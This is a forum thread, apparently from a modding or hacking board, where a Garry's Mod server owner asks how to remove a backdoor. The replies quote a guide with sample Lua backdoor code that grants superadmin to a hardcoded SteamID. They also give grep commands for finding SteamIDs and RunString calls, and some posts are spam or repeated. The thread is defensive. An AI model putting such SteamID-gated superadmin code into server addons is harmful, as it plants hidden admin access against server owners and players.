Garry's Mod How to remove BACKDOOR ? Submitted by Zebeub2000, 29-04-2022, 08:25 PM, Thread ID: 241506 Thread Closed Reply 29-04-2022, 08:25 PM #1 I have a server and i have a backdoor so how to remove :( More RE: How to remove BACKDOOR ? 06-05-2022, 04:29 AM #2 Do You What File It Is Located In ? Source Of Quote: https://mtxserv.com/gmod-server/doc/how-...or-on-gmod To identify a backdoor, you have to look at all SteamIDs. For example: AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:58 Drakehawke (STEAM_0:0:22342869) (64 commits on old SVN) That is not a backdoor. It's just the name of a legit player. A backdoor looks like this: 2 - AUTHENT (Presence of Steam ID) addons/nestorro/lua/autorun/nestorro_launch.lua:101 if ( ply:SteamID() == "STEAM_0:1:64045285") then If you have ply:SteamID() == "STEAM_0:100000000") then It's possibly a backdoor. You always have to check something like that! A backdoor can be something like: if ( ply:SteamID() == "STEAM_0:1:00000000") then RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin") else How to remove a backdoor? To remove the entire backdoor, remove the code (which can look like this): concommand.Add( "Nestor", function(ply) if ( ply:SteamID() == "STEAM_0:0:82261024") then RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin") else ply:ChatPrint("Bye " .. ply:Name() .. ".") end end) More RE: How to remove BACKDOOR ? 07-05-2022, 08:20 AM #3 To remove the entire backdoor, remove the code (which can look like this): Here comes the bus. More RE: How to remove BACKDOOR ? 22-05-2022, 09:46 AM This post was last modified: 22-05-2022, 10:29 AM by Globungus #4 Good things to look for are SteamIDs as mentioned, my preferred method is to search for any 17 digit numbers (SteamID 64) and STEAM_ Can be accomplished with Code:find ./ -exec grep -E '\d{17}|STEAM_' {} \; -print 2>/dev/null For bytecode and other obfuscated code try to search for RunString with Code:find ./ -exec grep 'RunString' {} \; -print 2>/dev/null More RE: How to remove BACKDOOR ? 05-06-2022, 04:51 PM #5 To remove the entire backdoor, remove the code (which can look like this): Here comes the bus. More
RE: How to remove BACKDOOR ? 06-05-2022, 04:29 AM #2 Do You What File It Is Located In ? Source Of Quote: https://mtxserv.com/gmod-server/doc/how-...or-on-gmod To identify a backdoor, you have to look at all SteamIDs. For example: AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:58 Drakehawke (STEAM_0:0:22342869) (64 commits on old SVN) That is not a backdoor. It's just the name of a legit player. A backdoor looks like this: 2 - AUTHENT (Presence of Steam ID) addons/nestorro/lua/autorun/nestorro_launch.lua:101 if ( ply:SteamID() == "STEAM_0:1:64045285") then If you have ply:SteamID() == "STEAM_0:100000000") then It's possibly a backdoor. You always have to check something like that! A backdoor can be something like: if ( ply:SteamID() == "STEAM_0:1:00000000") then RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin") else How to remove a backdoor? To remove the entire backdoor, remove the code (which can look like this): concommand.Add( "Nestor", function(ply) if ( ply:SteamID() == "STEAM_0:0:82261024") then RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin") else ply:ChatPrint("Bye " .. ply:Name() .. ".") end end) More
RE: How to remove BACKDOOR ? 07-05-2022, 08:20 AM #3 To remove the entire backdoor, remove the code (which can look like this): Here comes the bus. More
RE: How to remove BACKDOOR ? 22-05-2022, 09:46 AM This post was last modified: 22-05-2022, 10:29 AM by Globungus #4 Good things to look for are SteamIDs as mentioned, my preferred method is to search for any 17 digit numbers (SteamID 64) and STEAM_ Can be accomplished with Code:find ./ -exec grep -E '\d{17}|STEAM_' {} \; -print 2>/dev/null For bytecode and other obfuscated code try to search for RunString with Code:find ./ -exec grep 'RunString' {} \; -print 2>/dev/null More
RE: How to remove BACKDOOR ? 05-06-2022, 04:51 PM #5 To remove the entire backdoor, remove the code (which can look like this): Here comes the bus. More